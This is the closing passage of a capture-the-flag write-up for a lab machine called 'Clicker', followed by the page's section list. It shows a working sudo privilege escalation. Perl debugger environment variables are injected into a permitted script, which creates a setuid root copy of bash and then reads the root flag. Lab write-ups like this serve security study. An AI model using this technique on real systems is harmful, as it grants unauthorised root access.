jack@clicker:~$ sudo PERL5OPT=-d PERL5DB='system("install -m4777 /bin/bash /tmp/rootbash2")' /opt/monitor.sh
No DB::DB routine defined at /usr/bin/xml_pp line 9.
No DB::DB routine defined at /usr/lib/x86_64-linux-gnu/perl-base/File/Temp.pm line 870.
END failed--call queue aborted.
jack@clicker:~$ ls -alh /tmp/rootbash2
-rwsrwxrwx 1 root root 1.4M Nov 30 19:02 /tmp/rootbash2

Root.txt

rootbash2-5.1# cat /root/root.txt
e9723498cf2ddce7d26f383ef5b69968

PreviousBusqueda NextCodify

Last updated 8 months ago

hashtagRecon

hashtagHTTP (80) (Enum)

hashtagNFS

hashtagHTTP (80)

hashtagSource Analysis

hashtagSQLi

hashtagAdministrator

hashtagReverse Shell (www-data)

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagPath 1

hashtagPath 2

hashtagPath 3

hashtagRoot.txt